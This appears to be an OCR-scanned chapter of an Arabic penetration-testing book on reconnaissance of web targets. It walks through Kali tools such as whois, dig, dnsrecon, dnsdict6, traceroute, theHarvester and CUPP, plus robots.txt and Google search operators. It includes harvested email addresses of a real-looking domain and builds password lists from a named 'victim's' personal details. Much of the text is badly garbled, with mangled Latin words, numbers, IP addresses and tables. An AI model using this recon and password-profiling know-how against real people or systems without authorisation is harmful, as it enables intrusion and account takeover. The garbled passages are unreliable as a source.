Zuula www.zuula.com Jiم‎ 


٠‏ المدونات الخاصة بالشركة الهدف أو الخاصة بالموظفين؟ 
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Linkeln, Facebook and ) Jûم شبكات التواصل الاجتماعي‎ ١ 
(Twitter 

٠‏ المواقع التي تقوم بعملية بحث عن 0۸8 وتؤمن معلومات عن 
السيرفر مثل 


DNSstuff www.dnsstuff.com 
ServerSniff www.serversniff.com 
Netcraft www.netcraft.com 


مجرك البحث «ةلكه۸ء: يؤمن معلومات عن أجهزة الشبكة وهذا 
يسمح للمهاجم بالبحث عن الجهاز لمعرفة الثغرات الخاصة به. 


استطلاع 0۸S‏ ورسم المسار إلى الهدف: 


DNS reconnaissance and route mapping 


بعد أن تقوم بالتعرف على الهدف من مصادر المعلومات المتاحة 
فالخطوة التالية هي معرفة معلومات عن عنوان ress‏ لهه ١۴‏ الخاص 
بالهدف والمسار بينك وبين الهدف ءأuهم‏ 

DNS: domain name service‏ هي خدمة تؤمن عملية تحويل أسماء 
المواقع على الانترنت إلى العناوين الرقمية الخاصة بها address‏ °| 
استطلاع 0۸S‏ يقوم بتعريف من هو مالك الدومين 

أو من هو مالك مجمgعة‏ glicيj IP addresses‏ 
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معلومات ٥NS‏ تعرف أسماء الدومين الفعلية وعناوين ۱۴ المخصصة 
للهدف والمسار بين مختبر الاختراق أو المهاجم والهدف. 

هذه المعلومات تكون فعالة بشكل جزئي وبعض هذه المعلومات 
متوفرة بشكل مجاني من مصادر مفتوحة والبعض الأخر من المعلومات 
يتم الحصول عليه طرق ثالث DNS registrars aتاذlجw Jû‏ 

يجب أن تدرك أن المعلومات التي تحصل عليها يمكن أن تكون قديمة أو 
ناقصة أو حتى تكون معلومات مضللة لذلك يجب عليك استخدام أكثر من 
أداة للقيام بعملية جمع المعلومات ومن ثم مقاطعة النتائج للحصول 
أفضل طريقة للقيام بهذه العملية هو استخدام سكريبت تؤدي مهمة 
جمع المعلومات بشكل أتوماتيكي سوف أعرض مثال لاستخدام 
سكريبتات مع أداة م2٣"‏ في فصل لاحق من هذا الكتاب. 


:WHOIS 
هي معرفة بعض المعلومات الأساسية‎ ١۴ أول خطوة للبحث عن عنوان‎ 
عن الموقع من خلال الأمر كامس كما في الشكل التالي:‎ 
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:~# whois google.com 
Whois Server Version 2.0 
Domain names in the .com and .net domains can now be registered 


with many different competing registrars. Go to http://ww.internic .net 
for detailed information. 


Aborting search 5O0 records found 
Server Name: GOOGLE.COM. AFRICANBATS . ORG 
Registrar: TUCOWS DOMAINS INC. 


whois Server: whois. tUCOWS .COM 
Referral URL: http://www. tucowsdomains . com 


Server Name: GOOGLE.COM. ANGRYPIRATES .COM 
IP Address: 8.8.8.8 

Registrar: NAME.COM, INC. 

whois Server: whois.name .com 

Referral URL: http ://www.name .com 


Server Name: GOOGLE.COM. AR 
Registrar: ENOM, INC. 
whois Server: whois .enom .com 


نتيجة هذه التعليمة تعرض معلومات جغرافية وأسماء وأرقام هواتف 
وهذه المعلومات يمكن أن تساعد في هجوم الهندسة الاجتماعية. 
يوجد العديد من المواقع المجانية على شبكة الانترنت تقوم بعملية 
kupتدا whois‏ بشکل اتوماتیکي ولکن الموقع یقوم بتسجیل عنوان ۱۲ 
الخاص بك في سجلاته. 


اختبار اختراق سيرفرات وتطبيقات الويب 1۹ 


استطلاع 0۸8: 


DNS: Domain Name System 
٠٥ وهي قاعدة بيانات موزعة تقوم بتحويل أسماء المواقع إلى عناوين‎ 


رقمية 


:~# dig google.com 


; <<>> Di6 9.9.5-9+deb8u4-Debian <<>> googla.com 
;; global options: +cmd 
; Got _answer: 
=>>HEADER<<- opcode: QUERY, status: NOERROR, id: 33572 
; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: O, ADDITIONAL : 


;; OPT PSEUDOSECTION: 
ا‎ version: O, flags:; udp: 4000 


QUEST LON SSECT LON: 
RLS E IN 


;; ANSWER SECTION: 
google.com. 88 IN 216.58.21.66 


;; Query time: O msec 

;; SERVER: 192.168.1.10#53(192.168.1.10( 
;; WHEN: Mon Jan 04 01:23:59 EST 2016 

2 MSG SEZE FCUG- 95 


مختبر الاختراق أو المهاجم يمكن أن يستخدم معلومات 0١N8‏ للقيام 
بإحدى الأمور التالية: 
هجوم القوة الغاشمة )ع ھatt brute-force‏ لمعرفة اسماء دومین 
جديدة مرتبطة بالهدف. 
١‏ إذا كان سيرفر 0۸S‏ يسمح بترجمة النطاق لأي طالب فهذا سوف 
يؤمن أسماء وعناوين الأجهزة المتصلة بالشبكة الداخلية وهذا 
يجعل من السهل التعرف على الهدف المحتمل, إذا كانت معلومات 


ختبار اختراق سيرفرات وتطبيقات الويب ۷۰ 


5 العامة (الخارجية) غير معزولة عن معلومات 0١×NS‏ للشبكة 
الخاصة (الداخلية) فإن مترجم النطاقات يمكن أن يكشف عن 
معلومات عن أسماء وعناوين الأجهزة في الشبكة الداخلية. 
کJ‏ Îجjaةö‏ كضdز‏ llتطJa IDS(Intruder Detection System)‏ 
و أجهزة ioع‏ illطJèa Protection System)‏ PS)ntruderا‏ تصدر 
انذار إذا طلب مترجم النطاقات ذلك. 

٠‏ إيجاد الخدمات التي يمكن أن تكون مصابة بثغرات (مثل ۴۳۴) أو 
التي يمكن التحكم بها عن بعد. 

١‏ إيجاد الخدمات الفعدة بشكل خاطيئ أو الخدمات الغير مرقعة 


unpatched servers 
يمن معلومات عن الخدمة والنقل‎ :Service records (SRV) " 
والبورت والترتيب ذو الأهمية للخدمات, هذا يسمح للمهاجم‎ 


باستنتاج السوفت وير 


DomainKeys Identified Mail (DKIM) " 
Sender Policy Framework (SPF) 


هذه التسجيلات تستخدم للتحكم بالايملات المزعجة اأة"-هء صممء 


وفي حال كانت هذه السجلات معروفة فإن المهاجم يستطيع 


معرفة أن الحماية قوية أكثر من باقي المنظمات وهنا تأتي أهمية 
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استخدام هجوم الهندسة الاجتماعية لأن هذا الهجوم لا يتأثر 
بالحماية القوية. 


کل من نظام تشغیل ویندوز ونظام لینکس يدعمان آدوات تعمل من 
خلال سطر الأوامر ٥ہ‏ iا-۵d com¬"‏ مثل مookupاsم‏ في نظام ویندوز و 
ونك في نظام لينکس 

للأسف فإن هذه الأدوات تستطيع التعامل مع سيرفر واحد في نفس 
الوقت وتتطلب إجابات تفاعلية لتكون فعالة. 

كالي مزود بعدة أدوات مخصصة لتقوم بالطلب المتكرر لمعلومات 0١S‏ 
من الهدف ولكن يجب أن تنتبه إلى أن الأداة التي تريد استخدامها يجب 
أن تكون متوافقة مع نسخة برتوكول الانترنت المستخدم الاتصال مع 
الھدف ۱۴6 or‏ ۱۴4 


:IP4 
وهو فعرف رقمي فريد يستخدم التعريف الأجهزة المتصلة مع بعضها‎ 
۱۶4 فى شبكة خاصة أو عامة (شبكة الانترنت). حالياً الانترنت مبني على‎ 


كالي يحوي على عدة أدوات تساعد في عملية استطلاع :0۸S‏ 
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هناك العديد من أدوات البحث واستطلاع 


5S dnsenum‏ ولکن ۸٥۵٤٥۲وول‏ هو الخيار الأول 
dnsmap‏ بسبب موثوقيته العالية ونتائجه يمكن أن يتم 
dnsrecon‏ تصدیر ها بشکل مباشر إلى ازامیھ)N‏ 
Framework‏ 
يقوم بتحديد من أين حصل الدومين المعطى 
dnstracer‏ على معلوماته ويتابع سلسلة السيرفرات 
5 التي تعرف هذه البيانات 


وهو منقح أو مصحح أخطاء يقوم بفحص 
| ا 
يقوم بتعیین مجالات ۲[ غير متجاورة 
Fierce‏ الا E‏ 
ترجمة النطاق تم يحاول القيام بهجوم القوة 
E‏ 


معظم مختبري الاختراق يستخدمون ۵٠۴٠اf‏ للتأكد من أن كل الأهداف 


الممكنة تم تعريفها ثم يتم استخدام أدوات أوسع مثل dnsenum and‏ 
reconاdns‏ اتوليد أكبر كمية من البيانات وتأمين درجة من الصحة. 
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الشکل التالي یظهر استخدام ١٤٥۲یہ‏ لتولید سجل بحث ۵۸×8 
معياري وبحث مخصص من أجل سجلات SR۷‏ 


:~# dnsrecon -d google.com 
[*] Performing General Enumeration of Domain: google.com 
DNSSEC is not configured for google.com 
3 SOA ns4.google.com 216.239.38.10 
3 ns1.google.com 216.239.322.10 
ا‎ ns4.google.com 216.239.38.10 
| ns2.google.com 216.239.34.10 
[*] ns3.google.com 216.239.36.10 
“1 aspmx.l.google.com 64.233.166.27 
[*] alt1.aspmx.l .google.com 64.233.1664.277 
1 alt4.aspmx.l.google.com 173.194.72.277 
hî alt3.aspmx.l.google.com 64.233.189.27 
E alt2.aspmx.l.google.com 74.125.68. 
[*] aspmx.l.google.com 2Za00:1450:400c : 
*] alt1.aspmx.l.google.com 2a00:1450: 
[*] alt4.aspmx.l.google.com 2404:6800: 
ا‎ ( alt3.aspmx.l.google.com 2404:6800: 
al ( alt2.aspmx.l.google.com 2404:6800: 
E] A google.com 216.58.210.206 
3 AAAA google.com 2a00:1450:4006 :803: :200e 
[*] TXT google.com v=spf1 include: _ spf .google. 
[*] Enumerating SRV Records 


S0۸ یسمح لمختبر الاختراق بالحصول علی سجل‎ DNSrecon 
وأجهزة تبادل الایمیلات انه"‎ name server )N8( واسم السيرفر‎ 
Sender plڌخiwlڊ‎ ةlwرملll و ایمیلات السیرفر‎ exchanger (MX) 

Policy Framework (SPF)‏ ومجال عناوین ۱۴ المستخدم. 


:IPv6 
رغم أن ۱۴۷4 يسمح بمجال كبير من العناوين لكن هذه العناوين يتم‎ 
استهلاکها عاماً بعد عام وهذا پجبرنا على استخدام‎ 


NAT (Network Address Translation) 
DHCP (Dynamic Host Configuration Protocol) 


rn 
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لزيادة عدد العناوين المتاحة تم إيجاد ۱۴۷6 لتحسين وزيادة مجال 
العناوين. 

حالیاً ۱۶۷6 يستخدم في عنونة أقل من %5 من عناوين الانترنت ولكن 
استخدامه یتزاید وکمختبر اختراق يجب أن تكون مستعد للتعامل مع 
هذه التقنية الجديدة من العنونة. 

في ۱۴۷6 عناوين المصدر والهدف لها طول 128 ءااط وهذا يعطي 
2 عنوان ممكن ءهذه الزيادة في الحجم أوجدت بعض المشاكل 
لمختبري الاختراق وخاصة عند استخدام أدوات البحث التي تمشي خلال 
مجال العناوين المتاحة للبحث عن السيرفرات التي تعمل .ولكن بعض 
خصائص ۱۴۷6 تسهل عملية الاكتشاف وخاصة عند استخدام 
MP v6) Internet Control Message Protocol)‏ | اتعریف الجھزة 
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يجب أن تدرك بعض الأمور قبل البدء بعملية البحث في ۱۴۷6 للأسباب 
التالية: 

١‏ هناك وظائف مختلفة في ۱۴۷6 تقوم بها أدوات الاختبار لذلك يجب 
على مختبر الاختراق التأكد من صلاحية الأداة العمل مع ۱٥۷4 o٣‏ 
6 أو في الشبكات المختلطة. 

» لان ۱۴۷6 نسبياً يعتبر برتوكول جديد فإن الشبكة الهدف يمكن أن 
تحوى على إخطاء في الإعداد وهذا يؤدي إلى فقدان البيانات 
المهمة لذلك يجب على مختبر الاختراق الاستعداد للتعامل مع هذه 
البيانات. 

١‏ الشبكات القديمة تحوي على جدران نارية وأنظمة منع تطفل 
وأنظمة اكتشاف التطفل (۴8| كمه ,۱08 ,ءااجسءءاf)‏ والتي لا 
تستطیع اکتشاف ۱۴۷6 لذلك پمکن لمختبر الاختراق استخدام ۱۴۷6 
sامtunn‏ للحفاظ على اتصال مخفي مع الشبكة الهدف وتبادل 
المعلومات مع الشبكة بكل مخفي. 


نظام کالي يحوي على عدة أدوات طورت للتعامل مع ۱۴۷6 (معظم 
أدوات البحث المعقدة مثل مہہ أصبحت الآن تدعم )۱٥۷6‏ 
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الجدول التالى يعرض بعض هذه الأدوات: 


۵×8 يقوم بعملية تعداد عكسية ل‎ dnsrevenum6 


لیعطي عناوین ۱۴۷6 


نتيجة تنفذ التعليمة 16ءا١ومك‏ يظهر بالشكل التالي: 


root@kali:~# dnsdict6 google.com 

Starting DNS enumeration work on google.com. 

Starting enumerating google.com. - creating 8 threads for 798 words... 
Estimated time to completion: 1 to 2 minutes 

www.google.com. => 2607: f8bO:400b:807::1012 

ipv6.google.com. => 2607: f8bO0:400b :8Ob : :1012 

mail .google.com. => 2607: f8bO0:400b :806: :1016 

blog .google.com. => 2607: f8bO0:4001:c00: :bf 
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رسم خريطة المسار إلى الهدف: 

رسم خريطة للمسار يتم عادتاً باستخدام أداوت تسمح برؤية المسار الذي 
تسلكه حزمة )‌هم ۱۶۴ من جهاز لآخر. 

باستخدام حقل (۲۲1۳) ٥۷ا‏ ها ممصا في حزمة )هم ۱۴ التي تنتقل 
من جهاز لاخر 

كل راوتر يقوم بعملية الاستقبال يقوم بإنقاص قيمة حقل ۲۲1 بمقدار 
4 


من وجهة نظر مختبر الاختراق فإن معلومات تتبع المسار تعطي البيانات 
المهمة التالية: 
٠‏ المسار بين المهاجم والهدف. 
" تلميحات عن طوبولوجية الشبكة الخارجية. 
١‏ كشف أجهزة التحكم بالوصول مثل الجدران النارية أو راوترات فلترة 
حزم البيانات. 
١‏ إذا كانت الشبكة فعدة بشكل خاطئ فإنه من الممكن التعرف على 
عناوين الشبكة الداخلية. 


الموقع وwww.tracroute.or‏ يقوم برسم عدة أشکال للمسار للشبكة 
الهدف. 
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في کالي یمکن استخدام الأداة مهه هما التي تستخدم حزم ۱|٥M۴‏ 
cketsوم‏ لرسم خریطة للمسار. 


الشكل التالي يظهر نتيجة استخدام الأnر traceroute‏ : 


# traceroute google .COM 

raceroute to google.com (216.58.210.206), 30 hops x, 60 byte packets 
192.168.1.100 (192.168.1.100) 1.302 ms 1.681 ms 2.334 ms 
82.137.200.2 (82.137.200.2) 45.698 ms 46.055 LEVEE IE 

5 10. ا ا‎ 20. a .254( 50.800 ms 54.432 ms 55.776 ms 


10 .192 ms 55.261 ms 54.824 ms 

10.200.8.9 (102 E 329.895 ms 330.491 ms 10.200.0.9 (10.200.0.9( 
18:1980.82137 (190.100.8.137, 60.855 NS 1O10 LOIS OOO TEST BB 
TG. TOOLS LIO LOB LSA 7 SMS 


O ک5‎ Uu ۸ 


0 ل 


أو يمكن استخدام الأمر ٤٣#٥ه۴†‏ في نظام ويندوز كما في الشكل 
التالي: 


C:x2tracert 24.226.16.35 


Tracing route to cache .googlevideo.com [24.226.16.35 1 
over a maxinun of 38 hops: 


1 1 ms <1 ns <1 ms 192.168. 
1 13 ms 7 ms 1 ns s72-38 2 41. static .comn.cgocable.net [72.38.69 


3 21 ms 31 ns 29 ns 18.64.232 .1 

4 164 ms 159 ms 2184 ns d226-8-197.home .cgocable .net [24.226.8.1971] 

5 95 ms 98 ms 95 ms cgowave—þbusy3-ubr.cgocable .net [24.226.6.133 ] 
6 12 ms 12 ms 14 ms cache .googlevideo.con [24.226.16.351 


Trace conplete . 


هذا المسار يمكن أن يختلف قليلا 
uteاceهاt‏ في کالي یستخدم بشکل افتراضي loÎ UDP datagrams‏ 
ICMP echo request (ICMP type 8) pii jgaigg „û tracert‏ 
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لذلك عند الانتهاء من استخدام ماuه٣معهع؛‏ في كالي من المهم 
استخدام عدة برتوكولات من أجل الحصول على المسار الكامل وتجاوز 
أجهزة فلترة حزم البيانات. 

كالي يحوي على الأدوات التالية من أجل اكمال عملية رسم المسار: 


۲٥۲/۱۴ وهي مترجم ومحالل لحزم‎ 
TCP, UDP, ICMP, and مpcدig‎ 


raw-|IP 


تسمح للمستخدم بتعداد قفزات ۱۴ 


من خلال استغلال اتصال ٥۲‏ 
الموجود من النظام أو الشبكة 
المحلية أو من الأجهزة المحلية 
وهذا يجعلها مفيدة جداً لتجاوز 
الفلاتر الخارجية مثل الجدران النارية 


3.امط هو واحدة من أهم الأدوات المفيدة لأن التحكم بها يعطىي 
عدة أنواع حزم البيانات كأم)عدم وعدة مصادر لحزم البيانات وعدة 
أهداف لحزم البيانات. 
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الحصول على معلومات المستخدم: 

العديد من مختبري الاختراق يقومون بجمع أسماء المستخدمين وعناوين 
البريد الالكتروني لاستخدامها في عملية الدخول إلى النظام الهدف. 
الطريقة الأكثر شيوعاً هي البحث عبر الموقع الهدف على شبكة الانترنت 
أو عبر مواقع التواصل الاجتماعي ويتم ذلك بشكل يدوي. 

بعض الأدوات الموجودة في كالي يمكن أن تقوم بعملية البحث بشكل 
اتوماتیکی. 

يمكن الاستفادة من عناوين البريد الالكتروني للموظفين السابقين لأن 
العديد من الشركات لا تقوم بتعطيل حسابات الموظفين السابقين بشكل 
فوري وهذا يعطي فرصة للمهاجم الاستفادة من هذا الخطأً للوصول 
إلى النظام الهدف. 


جمع الأسماء وعناوين البريد الالكترونى: 

أداة theharvester‏ هي سکریبت مکتوب بلعة بايثون وتقوم بالبحث عبر 
محركات البحث المشهورة ومواقع أخرى عن عناوين البريد الالكترونىي 
والدومينات الفرعية. 


استخدام هذه الأداة بسيط ويحوي على بعض الخيارات الممكنة وهي: 
٠‏ ك-: يستخدم لتعريف الدومين ليتم استكشافه 
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ط-: تستخدم لتعريف مصدر استخراج البيانات ويجب أن تكون أحدى 


المواقع التالية: 
Bing, BingAPlI, Google, Google-Profiles, Jigsaw,‏ 
Linkedin, People123, PGP or All‏ 


:-١‏ تستخدم لجعل الأداة تقوم بحصد البيانات من عدد محدد من 
نتائج البحث المعادة 

" ۴-: هذا الخيار يستخدم لحفظ النتيجة النهائية کloلف HTML or‏ 
XML‏ 
إذا لم يتم استخدام هذا الخيار سوف يتم عرض النتيجة على 
الشاشة ولن يتم حفظها بعد ذلك. 


الشكل التالي يظهر نتيجة بحث بسيط في ءم×ملہ| ماوممB‏ عن دومين 
digitaldefence.ca‏ 
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:~# theharvester -d digitaldefence.ca -b google 
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* TheHarvester Ver. 2.6 
* Coded by Christian Martorella 
“ Edge-Security Research 
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[ -] Searching in Google: 
Searching O results... 
Searching 100 results... 


robert .beqgs@digitaldefence.ca 
Robert .beggs@digitaldefence.ca 
@digitaldefence.ca 
csirtûadigitaldefence.ca 


[+] Hosts found in search engines: 


[ -] Resolving hostnames IPs... 
54.236.190.114:www.digitaldefence.ca 


جمع مستندات المعلومات الذاتية: 


المعلومات الذاتية هخةكهامص هي المعلومات عن المعلومات وتسهل 
عملية الوصول أو استعمال المعلومات (مثل دليل المكتبة الذي يحوى 
على معلومات عن طبيعة الكتاب وموقعه). 


التالى هو أمثلة على ما تحويه هذه المستندات: 


اختبار اختراق سيرفرات وتطبيقات الويب 


١‏ اسم الشركة أو الشخص الذي يملك التطبيق المستخدم في خلق 
المستند. 

اسم كاتب أو مؤلف المستند. 

وقت وتاريخ خلق المستند. 

وقت طباعة المستند أو وقت أخر تعديل على المستند. 

٠‏ الموقع الذي تم خلق المستند به. 

١‏ بعض الملفات وخاصة التي يتم خلقها من قبل كاميرات أجهزة 
الموبايل يمكن أن تحوي على إضافات تحوي على معلومات 
جغرافية عن المكان الذي أخذت فيه الصورة. 


المعلومات الذاتية aاة١ةام"‏ هي غير مرئية بشكل مباشر من قبل 
المستخدم. 

هذه المعلومات يمكن أن تستخدم من قبل مختبر الاختراق أو المهاجم 
والذي يمكن أن يقوم بعملية حصد للأسماء من خلال مقارنتها مع 
البيانات الموجودة داخل المستندات وهذا يمكن أن عرف الأشخاص 
المرتبطين بنوع معين من أنواع البيانات مثل التقارير المالية السنوية أو 
الخطط الاستراتيجية. 

بما أن أجهزة الموبايل أصبحت منتشرة بكثرة فإن المخاطر المتعلقة 
بالمعلومات الذاتية الجغرافية تزداد باستمرار. 


اختبار اختراق سيرفرات وتطبيقات الويب 


المهاجم يبحث عن الأماكن ( بيت أو فندق أو مطعم) والتي يتم زيارتها 
بشكل متكرر من قبل الهدف, مثلاً إذا كان موظف الشركة الهدف يقوم 
بنشر صور في شبكات التواصل الاجتماعي في مطعم معين و بشكل 
متكرر فإن مختبر الاختراف يمكن أن يقوم بهجوم لاسلكي أو اختلاس 
النظر على جهاز الهدف من أجل رؤية اسم المستخدم وكلمة السر. 


البحث في بروفايل المستخدم لخلق قائمة 
بكلمات السر: 

لقد تحدثنا عن البحث الغير فعال لجمع الأسماء والمعلومات المتعلقة 
بالمستخدمين في الموقع الهدف. 

الخطوة التالية هي استخدام هذه المعلومات لخلق ملف يحوي على 
كلمات السر التي تخص المستخدمين في الموقع الهدف. 

قوائم كلمات السر الأكثر شيوعاً واستخداماً متوفرة في الانترنت ويمكن 
تحميلها بسهولة بالإضافة إلى أن بعض هذه القوائم متوفرة في كالي 
في المسار التالa lusrIshare/wordlists‏ 


اختبار اختراق سيرفرات وتطبيقات الويب 


|< > | @ usr share | wordlists IA SEV“ |5 © © O 


ِ ِ ت ت 
ڪڪ ڪڪ Û Pictur‏ 
= کڪ اوا Û Pictures‏ 
FH Videos dirb dirbuster dnsmap.txt fasttrack.txt‏ 
ج a r a‏ س 2 

1 ا‎ 
129 GB Volume fern-wifî metasploit metasploit-jtr nmap.lst 
54 GB Volume ۳ a. ا‎ e: 
54 GB Volume ا : ا‎ 

rockyou.txt.gz sqlmap.txt termineter.txt wfuzz 

النظام محجوز 
ھ Ê ESD-USB‏ 
&ھ H SAMSUNG...‏ 
Computer‏ 
SB Browse Network‏ 
Connect to Server‏ @ 


هذه القوائم تحوي على كلمات السر الأكثر استخداماً من قبل عامة 
المستخدمين ويمكن أن تستغرق وقت طويل خلال عملية محاولة 
استخدام كلمة السر في التطبيق قبل الانتقال إلى كلمة السر التالية 
لحىسن الحظ ڑjl‏ ÎJlدöl Common User Password Profiler (CUPP)‏ 


تسمح لمختبر الاختراق بتوليد قائمة اءiا۵٬مس‏ تحوي على حروف أو 
كلمات معينة تخص المستخدم الهدف. 


۶۴ل كانت موجودة في الباك تراك ولكنها غير موجودة في كالي 
ويمكن تحميلها من خلال التعليمة التالية: 


اختبار اختراق سيرفرات وتطبيقات الويب 


git clone https:l//github.com/Mebus/cupp.git 


:~# git clone https://github .com/Mebus/cupp.git 


CLONING LNEO EUDBP 
remote: Counting objects: 31, done. 


remote: Total 31 (delta 0), reused O0 (delta 0), pack -reused 31 
Unpacking objects: 100% (31/31), done. 
Checking connectivity... done. 


هذه التعليمة سوف تقوم بتحمل ۴۴لا للمجلد المحلي 


هذه الأداة هي سکريبت مكتوب باغة بایثون tماءs‏ ٣٥ط‏ ار ویمکن 
استدعاء هذه الأداة باستخدام الأمر التالي ولكن يجب تطبيق هذا الأمر 
بعد الانتقال إلى المسار الذي يحوي هذه الأداة: 


:~# cd cupp/ 
:~/cupp# ls 

upp.cfg cuppr?py docs README .md 
:~/cupp# python cupp.pPy_-i 


Insert the informations about the victim to make a dictionary 
If you don't know all the info, just hit enter when asked! ;)] 


First Name: Ahmad 

Surname : bana 

Nickname: hamood 

Birthdate (DDMMYYYY) : 01021983 


هذه التعليمة سوف تحضر الأداة ۴٥لا‏ بنمط تفاعلي وتسمح 
للمستخدم يتحديد عناصر محددة من المعلومات التي سوف تستخدم 
في خلق قائمة كلمات السر. 


اختبار اختراق سيرفرات وتطبيقات الويب 


الأداة تطلب منك ادخال بعض المعلومات عن الضحية مثل اسمه الأول 
واسمه الثاني وتاريخ ميلاده واسم زوجته واسم أطفاله ثم تقوم 
باستخدام هذه المعلومات لخلق ملف يحوي على قائمة بكلمات السر. 


بعد الانتهاء سوف يتم توليد ملف اisاdQ‏ امس داخل المجlد CUPP‏ 


التعرف على سيرفر الويب: 

سوف نهاجم سيرفر الويب لأنه مصعم بشكل يسمح الوصول إليه من 
خارج الشبكة والغاية الأساسية منه هي استضافة تطبيق الويیب الذي 
يمكن الوصول إليه من قبل المستخدمين خارج الشبكة الداخلية, 
وسيكون نافذتنا إلى الشبكة. 


في البداية نحن بحاجة لإيجاد عنوان سيرفر الويب الخارجي ۴| اه١٣ءا»×م‏ 


address 

عادتاً تكون البداية مع عنوان ال للھدف مثل ہ٥e.coاوoەەو.wwwWw‏ 
والذى سنقوم لاحقاً بتحويله إلى عنوان رقمى كء٥‏ ههه ۲| 

ا8ل يكون عادتاً على شكل نصيى ليتمكن المستخدم من تذكره بسهولة 
بينما عنوان ess٣كهله‏ ۱۴ فهو عنوان رقمي فريد لسيرفر الويب. 


أدوات اختبار الاختراق تستخدم عنوان ۱P address‏ 


اختبار اختراق سيرفرات وتطبيقات الويب 


الحصول على العنوان الرقمي ءءء لهه ۱۴ يتم باستخدام ااتعليمة host‏ 
في کالي لينکس كما في المثال التالي: 


:~# host google.com 


google.com has address 216.588.213.174 


هذه التعليمة سوف تعود بالنتيجة التالية والتي تحوى على عنوان ٠۴‏ 
‰5 الخارجي. 

يمكنك أيضاً الحصول على عنوان sكها١هه ١۴‏ من خلال استخدام تعليمة 
ونم في نظام ویندوز أو في نظام کالي. 

متصفح الويب له القدرة على التعامل مع عناوين ۱۴ وعناوين URL‏ 
للحصول على نفس الصفحة, للتأكد من ذلك قم بإدخال عنوان ۱۴ الذي 
حصلت عليه مباشراً في المتصفح. 

تنبیه: الطلب باستخدام 5ئ6٣‏ كهه ۱۴ بدلا من عنوان ال غير قابل 
للتطبيق في البيئة التي يكون فيها السيرفر مشترك أي أن سيرفر 
الويب يستضيف أكثر من موقع ويب وذلك على نفس عنوان address‏ Pا‏ 
يمكنك استخدام خدمة تعمل بشكل اون لاینjù http://sharingmyip.com Ji‏ 
لإيجاد كل الدومينات التي تشترك بنفس عنوان ٣٠s‏ ١هه‏ ۱۴ لتتأكد من 


أن سيرفر الويب يستضيف هدفك المرغوب 1 يمكنك معرفة المواقع 


اختبار اختراق سيرفرات وتطبيقات الويب 


التي تعمل على نفس السيرفر من خلال كتابة عنوان ١۴‏ في محرك 
البحث وہام 

العديد من بيئات الاستضافة المشتركة تتطلب توقيع اتفاقية قبل أي 
اختبار حماية للبيئة. 


:Robots.txt ٔélo 


هذا الملف متوفر للعامة وبشكل علني وهو طريقة للتعرف على ما 
الذي يعمل على سيرفر الويب لأنه يحوي على قائمة بالمجلدات 
والملفات الموجودة على سيرفر الويب والتي يريد مالك التطبيق 
حذفها من عملية الفهرسة ونتائج محركات البحث. 


search engine spiders pul! ويعرف أيضاً‎ 


erاrawاc :Web‏ هو جزء من سوفت وير والذي یستخدم اتصنیف 
المعلومات ليتم استخدامها في محركات البحث والأرشفة والتي غالباً ما 
يتم نشرها من قبل محركات البحث مJû Google and Yahoo‏ 

بالنسبة للمهاجم فإن ملف ا×ا.sاماهءم‏ هو خارطة الطريق لتعريف 
المعلومات الحساسة لأن أي ملف ا×ا.ئاهطهء لأي سيرفر ويب و يمكن 


أن يعرض في المتصفح من خلال طلبه في عنوان UR‏ 


اختبار اختراق سيرفرات وتطبيقات الويب 


التالي مثال على ملف ا×ا.sاهطه٣‏ والذي يمكن أن بَعرض بسهولة 
وبشكل مباشر في متصفحك من خlاJ‏ طب host URL دeڊ robots.txt‏ 


انفرض أن الموقع الهدف هو موقع الفيس بوك 


facebook.com/robots.txt :jlgiell نقوم بطب‎ 


وستكون النتيجة كالتالي: 


Û https://www.facebook.com/robots.txt‏ '@ ے 


# Notice: if you would like to crawl Facebook you can 

# contact us here: http://www. facebook.com/apps/site_scraping_tos.php 
# to apply for white listing. Our general terms are available 

# at http://www. facebook.com/apps/site_scraping_tos_terms.php 


User-agent: baiduspider 
Disallow: /ac.php 

Disallow: /ae.php 

Disallow: /ajax/ 

Disallow: /album.php 
Disallow: /ap.php 

Disallow: /autologin.php 
Disallow: /checkpoint/ 
Disallow: /feeds/ 

Disallow: /1.php 

Disallow: /o.php 

Disallow: /p.php 

Disallow: /photo.php 
Disallow: /photo_comments.php 
Disallow: /photo_search.php 
Disallow: /photos.php 
Disallow: /share.php 
Disallow: /sharer/ 


ملف ×ا.امطهء هذا يقدم أربع قطاعات مختلفة: 


-١‏ المجلدات 
۲- الملفات 
(clean URLS) ٽGIjlwuall -T‏ 


اختبار اختراق سيرفرات وتطبيقات الويب 


‘- lwallرaGI (no clean URLS)‏ 
sاٰUR‏ eanاC‏ هو مسار عنوان كامل ومدقق يوصلك إلى صفحة معينة 
إذا قمت بنسخه ولصقه في متصفحك. 
المسارات sاUR‏ eanاc n0‏ تستخدم بارامتر (ه في هذا المثال) لقيادة 
ان ee oo‏ يإ |1 ۰ i‏ 


کل سیرفر ویب یجب أن يلك root directory „yi robots.txt dlo‏ 

ومن ناحية أخرى ء٣ماسهءء‏ امس يمكن أن يفهرس كامل الموقع 

متضمناً قواعد البيانات والملفات التى يريد مدير أو مالك سيرفر الويب 

عرضها خلال عمليات البحث. 

directory‏ 0tدا:‏ لسيرفر الويب هو المجلد الذي يتم تنصيب سوفت وير 

سيرفر الويب فيه في نظام ویندوز y٣هاec‌dir lialc root‏ هو: 
C:/linetpub/wwwrppt‏ 

وفي نظام لینکس: 


/VarlIWWW/ 


اختبار اختراق سيرفرات وتطبيقات الويب 


:Google hacking 
الاختراق باستخدام محرك البحث غوغل للقيام بعملية استطلاع لتطبيق‎ 
الويب الهدف.‎ 


هذه الطريقة تتم باستخدام معاملات البحث في محرك البحث غوغل من 
أجل الحصول على نتائج معينة. 


بعض معاملات غوغل هي: 
eallعJoel Operator‏ 


البحث في عناوين الصفحات 


البحث في عناوين الصفحات 


البحث في عناوين ا U‏ 


البحث في عناوين ا U‏ 


البحث عن نوع معين من الملفات 


البحث في نص الصفحات فقط 


البحث عن روابط لصفحات معينة 


اختبار اختراق سيرفرات وتطبيقات الويب 


الاستطلاع الفعال والبحث عن النغرات: 

الهدف من مرحلة الاستطلاع هو جمع أكبر كمية من المعلومات عن 
الهدف من أجل تسهيل عملية الاستغلال. 

الاستطلاع الفعال يعتمد على نتيجة الاستطلاع الغير فعال ويركز على 
استخدام الفحص والتحقق للتعرف على الهدف. 

الاستطلاع الفعال ينتج معلومات إضافية ومعلومات مفيدة عن الهدف. 
عملية جمع المعلومات بشكل فعال تتم من خلال التفاعل مع الهدف 
وهذا التفاعل يمكن أن يتم تسجيله في سجلات نظام الهدف أو يمكن 
أن يثير ويشغل الإنذار في نظام الحماية كالجدران النارية أو أنظمة منع 
